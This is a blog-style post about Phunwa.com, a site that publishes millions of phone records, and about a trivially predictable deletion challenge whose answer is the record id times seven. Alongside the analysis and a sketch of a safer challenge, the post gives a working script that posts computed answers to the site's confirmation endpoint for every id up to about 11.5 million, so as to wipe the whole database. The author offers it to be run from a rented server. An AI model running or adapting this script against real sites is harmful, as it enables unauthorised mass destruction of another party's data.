Alright, I can't really call this an app; it's more of a search engine... one that lets you delete its records.
This website pissed me off because it makes ~11.5 million telephone records and related information (name, address) publicly searchable and indexable. I guess Google has already indexed all of the pages, so even if you delete a record, the information is still accessible in the search result descriptions, not to mention the cached copies.
It supposedly takes its data from BSNL's searchable but non-indexable directory.
I could go on about why this is a privacy issue, but I'll leave that for another post.
There's a tiny delete button at the bottom that takes you to a removal page for that record.
There's an id parameter (passed in the POST body) associated with each telephone record, which I suppose is the record's database id.
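To make "passed in the POST body" concrete: the id is not in the URL's query string but travels as a URL-encoded form field. A minimal sketch, assuming the form field names used in the author's script; the helper name `build_remove_body` is hypothetical.

```python
from urllib.parse import urlencode


def build_remove_body(record_id: int) -> bytes:
    """Hypothetical helper: encode the removal form fields as a POST body."""
    params = {
        'id': record_id,
        'Remove this entry': 'Remove this number from the site',
    }
    # urlencode joins fields with '&' and turns spaces into '+'
    return urlencode(params).encode('ascii')


if __name__ == '__main__':
    print(build_remove_body(800000).decode('ascii'))
    # → id=800000&Remove+this+entry=Remove+this+number+from+the+site
```

Because the id is just a plain integer field in the body, nothing stops a client from sending any id it likes.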
That page asks you to solve a simple addition problem before the record is removed. The two numbers in the equation are plain text in the DOM, so they can be scraped to automate the deletion of a record.
I wrote a Python script that parses the HTML with a regex and retrieves those numbers:
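import re
import urllib.parse
import urllib.request

# Matches the two operands of the "X + Y" addition shown on the removal page
equation = re.compile(r'([0-9]+) \+ ([0-9]+)')
p_url = 'http://www.phunwa.com/removeentry/'

for counter in range(800000, 800005):
    params = {
        'id': counter,
        'Remove this entry': 'Remove this number from the site',
    }
    # Passing data makes urllib send a POST with a form-encoded body
    data = urllib.parse.urlencode(params).encode('ascii')
    with urllib.request.urlopen(urllib.request.Request(p_url, data=data)) as phunwa:
        source = phunwa.read().decode('utf-8', errors='replace')
    for num in equation.findall(source):
        print('id: %s | %s + %s = %s'
              % (counter, num[0], num[1], int(num[0]) + int(num[1])))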
This gives the following output:
id: 800000 | 119805 + 5480195 = 5600000
id: 800001 | 787730 + 4812277 = 5600007
id: 800002 | 534978 + 5065036 = 5600014
id: 800003 | 155396 + 5444625 = 5600021
id: 800004 | 88748 + 5511280 = 5600028
For each increment of the id, the answer increases by 7 (even though the two numbers themselves are different each time), which can only mean one thing:
Whoever designed this thing has never heard of reCAPTCHA.
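The pattern is easy to confirm mechanically. This short sketch parses the five output lines reported in the post and checks that each answer equals 7 × id and that consecutive answers differ by exactly 7. The function name `check_pattern` is just for illustration.

```python
import re

# The five output lines reported in the post, copied verbatim
OUTPUT = """\
id: 800000 | 119805 + 5480195 = 5600000
id: 800001 | 787730 + 4812277 = 5600007
id: 800002 | 534978 + 5065036 = 5600014
id: 800003 | 155396 + 5444625 = 5600021
id: 800004 | 88748 + 5511280 = 5600028"""

LINE = re.compile(r'id: (\d+) \| (\d+) \+ (\d+) = (\d+)')


def check_pattern(text):
    """Return (id, answer, answer == 7 * id) for every parsed output line."""
    rows = []
    for m in LINE.finditer(text):
        record_id, a, b, answer = map(int, m.groups())
        if a + b != answer:
            raise ValueError('inconsistent sum on id %d' % record_id)
        rows.append((record_id, answer, answer == 7 * record_id))
    return rows


if __name__ == '__main__':
    rows = check_pattern(OUTPUT)
    for record_id, answer, matches in rows:
        print(record_id, answer, matches)
    # Consecutive answers differ by exactly 7
    print([nxt[1] - cur[1] for cur, nxt in zip(rows, rows[1:])])  # → [7, 7, 7, 7]
```

The two operands are randomized, but their sum is fully determined by the id, so the "challenge" carries no secret at all.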
It doesn't even verify that the referrer (the URL of the page for the phone number associated with the id) is correct, but that's too much to ask considering the confirmation method they chose to implement is answer = id * 7.
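For contrast, here is a minimal sketch of a confirmation challenge that cannot be derived from the id. It is a hypothetical illustration, not how Phunwa works: the server picks random operands, keeps the expected answer server-side (a plain dict stands in for a real session store, which is an assumption), binds it to the record id and accepts each token only once. `ChallengeStore`, `issue` and `verify` are made-up names.

```python
import secrets


class ChallengeStore:
    """Hypothetical server-side store for one-time addition challenges."""

    def __init__(self):
        # token -> (record id, expected answer); stands in for a session store
        self._pending = {}

    def issue(self, record_id: int):
        """Create a challenge for record_id; return (token, a, b) to render."""
        a = secrets.randbelow(900_000) + 100_000
        b = secrets.randbelow(900_000) + 100_000
        token = secrets.token_urlsafe(16)
        self._pending[token] = (record_id, a + b)
        return token, a, b

    def verify(self, token: str, record_id: int, answer: int) -> bool:
        """Accept only the right answer, for the right id, exactly once."""
        entry = self._pending.pop(token, None)  # pop makes the token single-use
        if entry is None:
            return False
        expected_id, expected_answer = entry
        return expected_id == record_id and answer == expected_answer
```

This only removes the predictability. Since the operands would still be plain text in the page, a scraper like the first script could still read and add them, which is why image- or behaviour-based CAPTCHAs such as reCAPTCHA are the usual choice.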
The total number of records is probably around 11,547,208. That's the highest id the site accepts before it starts returning an HTTP 500.
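The post doesn't say how that upper bound was found. One efficient approach is an exponential search followed by a binary search over a yes/no probe. It assumes ids are contiguous from 1 and every id above the last record fails, so the probe is monotonic. `record_exists` is a hypothetical stand-in for "request this id and check it doesn't return a 500"; here it is any Python callable, so no network is involved.

```python
from typing import Callable


def highest_valid_id(record_exists: Callable[[int], bool]) -> int:
    """Largest n with record_exists(n) True, assuming the predicate is
    True for 1..N and False for every id above N. Returns 0 if none."""
    if not record_exists(1):
        return 0
    # Exponential search: double hi until it lands past the last record
    lo, hi = 1, 2
    while record_exists(hi):
        lo, hi = hi, hi * 2
    # Invariant: record_exists(lo) is True and record_exists(hi) is False
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if record_exists(mid):
            lo = mid
        else:
            hi = mid
    return lo


if __name__ == '__main__':
    print(highest_valid_id(lambda n: n <= 11_547_208))  # → 11547208
```

With a bound around 11.5 million this needs fewer than 50 probes, instead of walking the ids one by one.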
In theory, it is therefore possible to delete every record on Phunwa.com without any user intervention, apart from renting an EC2 instance and running this script:
import urllib.error
import urllib.parse
import urllib.request


def annihilate_phunwa():
    p_url = 'http://www.phunwa.com/confirmdelete/'
    # ids run from 1 up to the highest id that doesn't return a 500
    for counter in range(1, 11547209):
        params = {
            'id': counter,
            'answer': counter * 7,  # the "challenge" answer is always id * 7
            'Confirm Delete': 'Submit Query',
        }
        data = urllib.parse.urlencode(params).encode('ascii')
        try:
            req = urllib.request.Request(url=p_url, data=data)
            urllib.request.urlopen(req).close()
        except urllib.error.HTTPError as e:
            # HTTPError.code holds the numeric HTTP status code
            if e.code == 500:
                print('id=%s may already be deleted!' % counter)
            else:
                print('Something else has gone wrong! (HTTP %s)' % e.code)


annihilate_phunwa()
I may update this code with a version that uses threading.